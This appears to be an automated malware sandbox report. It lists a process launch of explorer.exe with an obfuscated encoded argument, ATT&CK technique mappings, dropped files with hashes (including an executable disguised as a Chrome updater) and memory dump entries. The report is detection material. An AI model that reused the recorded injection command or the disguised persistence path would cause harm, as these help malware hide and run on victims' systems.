C:\Windows\explorer.exe
C:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==
7⤵
PID:3696

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\720167.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Local\720167.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
443B

MD5
8add56521ef894ef0c66ecd3e989d718

SHA1
2058aa5185fd5dcce7263bef8fe35bf5e12dbc7f

SHA256
01bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724

SHA512
af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
Filesize
461KB

MD5
a999d7f3807564cc816c16f862a60bbe

SHA1
1ee724daaf70c6b0083bf589674b6f6d8427544f

SHA256
8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

SHA512
6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

Download Submit
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
Filesize
461KB

MD5
a999d7f3807564cc816c16f862a60bbe

SHA1
1ee724daaf70c6b0083bf589674b6f6d8427544f

SHA256
8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

SHA512
6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
Filesize
384KB

MD5
55c797383dbbbfe93c0fe3215b99b8ec

SHA1
1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

SHA256
5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

SHA512
648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
Filesize
384KB

MD5
55c797383dbbbfe93c0fe3215b99b8ec

SHA1
1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

SHA256
5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

SHA512
648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

Download Submit
C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dll
Filesize
1.3MB

MD5
8be215abf1f36aa3d23555a671e7e3be

SHA1
547d59580b7843f90aaca238012a8a0c886330e6

SHA256
83f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae

SHA512
38cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.2MB

MD5
8268ff95b3aaea6d6de8f02a73c323d2

SHA1
ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256
529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA512
9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Download Submit
memory/204-194-0x0000000000000000-mapping.dmp

Download
memory/348-206-0x0000000000000000-mapping.dmp

Download
memory/452-179-0x0000000000000000-mapping.dmp

Download
memory/1112-143-0x0000000008CD0000-0x0000000008D0C000-memory.dmp

Filesize
240KB

Download
memory/1112-131-0x0000000005B70000-0x0000000005C02000-memory.dmp

Filesize
584KB

Download
memory/1112-150-0x0000000009C10000-0x0000000009C8A000-memory.dmp

Filesize
488KB

Download
memory/1112-136-0x0000000006030000-0x0000000006080000-memory.dmp

Filesize
320KB

Download
memory/1112-140-0x00000000067C0000-0x0000000006822000-memory.dmp

Filesize
392KB

Download
memory/1112-141-0x0000000008A00000-0x0000000008BC2000-memory.dmp

Filesize
1.8MB

Download
memory/1112-137-0x0000000005EF0000-0x0000000005F12000-memory.dmp

Filesize
136KB

Download
memory/1112-135-0x0000000006610000-0x00000000066C0000-memory.dmp

Filesize
704KB

Download
memory/1112-130-0x0000000000660000-0x0000000000694000-memory.dmp

Filesize
208KB

Download
memory/1112-144-0x0000000009B20000-0x0000000009B86000-memory.dmp

Filesize
408KB

Download
memory/1112-132-0x0000000006830000-0x0000000006DD4000-memory.dmp

Filesize
5.6MB

Download
memory/1164-218-0x0000000000000000-mapping.dmp

Download
memory/1268-177-0x0000000000000000-mapping.dmp

Download
memory/1276-196-0x0000000000000000-mapping.dmp

Download
memory/1316-152-0x00007FFE0DC40000-0x00007FFE0E701000-memory.dmp

Filesize
10.8MB

Download
memory/1316-151-0x00000113DF520000-0x00000113DF95E000-memory.dmp

Filesize
4.2MB

Download
memory/1348-219-0x0000000000000000-mapping.dmp

Download
memory/1392-174-0x0000000000000000-mapping.dmp

Download
memory/1420-184-0x0000000000000000-mapping.dmp

Download
memory/1548-170-0x0000000000000000-mapping.dmp

Download
memory/1632-225-0x0000000000000000-mapping.dmp

Download
memory/1976-172-0x0000000000000000-mapping.dmp

Download
memory/1980-180-0x0000000000000000-mapping.dmp

Download
memory/2036-193-0x0000000000000000-mapping.dmp

Download
memory/2152-176-0x0000000000000000-mapping.dmp

Download
memory/2292-168-0x0000000000000000-mapping.dmp

Download
memory/2332-182-0x0000000000000000-mapping.dmp

Download
memory/2364-161-0x0000000000000000-mapping.dmp

Download
memory/2440-187-0x0000000000000000-mapping.dmp

Download
memory/2472-190-0x0000000000000000-mapping.dmp

Download
memory/2484-162-0x0000000000000000-mapping.dmp

Download
memory/2560-221-0x0000000000000000-mapping.dmp

Download
memory/2560-160-0x0000000000000000-mapping.dmp

Download
memory/2616-201-0x0000000000000000-mapping.dmp

Download
memory/2664-163-0x0000000000000000-mapping.dmp

Download
memory/2788-208-0x0000000000000000-mapping.dmp

Download
memory/2808-181-0x0000000000000000-mapping.dmp

Download
memory/2924-220-0x0000000000000000-mapping.dmp

Download
memory/3100-211-0x0000000000000000-mapping.dmp

Download
memory/3328-178-0x0000000000000000-mapping.dmp

Download
memory/3424-165-0x0000000000000000-mapping.dmp

Download
memory/3428-217-0x00000244B94C0000-0x00000244B94D2000-memory.dmp

Filesize
72KB

Download
memory/3428-200-0x00007FFE0F180000-0x00007FFE0FC41000-memory.dmp

Filesize
10.8MB

Download
memory/3472-210-0x0000000000000000-mapping.dmp

Download
memory/3524-209-0x0000000000000000-mapping.dmp

Download
memory/3596-222-0x0000000000000000-mapping.dmp

Download
memory/3696-229-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3696-233-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3696-228-0x000000014036DAD4-mapping.dmp

Download
memory/3696-226-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3696-232-0x0000000000E40000-0x0000000000E60000-memory.dmp

Filesize
128KB

Download
memory/3696-230-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/3764-171-0x0000000000000000-mapping.dmp

Download
memory/3812-167-0x0000000000000000-mapping.dmp

Download
memory/3892-223-0x0000000000000000-mapping.dmp

Download
memory/3928-202-0x0000000000000000-mapping.dmp

Download
memory/3928-205-0x00007FFE0F180000-0x00007FFE0FC41000-memory.dmp

Filesize
10.8MB

Download
memory/3968-189-0x0000000000000000-mapping.dmp

Download
memory/4000-188-0x0000000000000000-mapping.dmp

Download
memory/4012-166-0x0000000000000000-mapping.dmp

Download
memory/4020-175-0x0000000000000000-mapping.dmp

Download
memory/4080-186-0x0000000000000000-mapping.dmp

Download
memory/4108-227-0x0000000000000000-mapping.dmp

Download
memory/4212-191-0x0000000000000000-mapping.dmp

Download
memory/4276-185-0x0000000000000000-mapping.dmp

Download
memory/4304-155-0x000001ABD6AA0000-0x000001ABD6AC2000-memory.dmp

Filesize
136KB

Download
memory/4304-156-0x00007FFE0DC40000-0x00007FFE0E701000-memory.dmp

Filesize
10.8MB

Download
memory/4304-154-0x0000000000000000-mapping.dmp

Download
memory/4456-153-0x0000000000000000-mapping.dmp

Download
memory/4468-231-0x0000000000000000-mapping.dmp

Download
memory/4496-145-0x0000000000000000-mapping.dmp

Download
memory/4536-157-0x0000000000000000-mapping.dmp

Download
memory/4552-195-0x0000000000000000-mapping.dmp

Download
memory/4556-158-0x0000000000000000-mapping.dmp

Download
memory/4576-207-0x0000000000000000-mapping.dmp

Download
memory/4652-173-0x0000000000000000-mapping.dmp

Download
memory/4688-183-0x0000000000000000-mapping.dmp

Download
memory/4704-159-0x0000000000000000-mapping.dmp

Download
memory/4712-216-0x0000000000000000-mapping.dmp

Download
memory/4740-164-0x0000000000000000-mapping.dmp

Download
memory/4888-169-0x0000000000000000-mapping.dmp

Download
memory/4908-213-0x0000000000401BEA-mapping.dmp

Download
memory/4908-215-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/4908-212-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/4960-224-0x0000000000000000-mapping.dmp

Download
memory/4964-192-0x0000000000000000-mapping.dmp

Download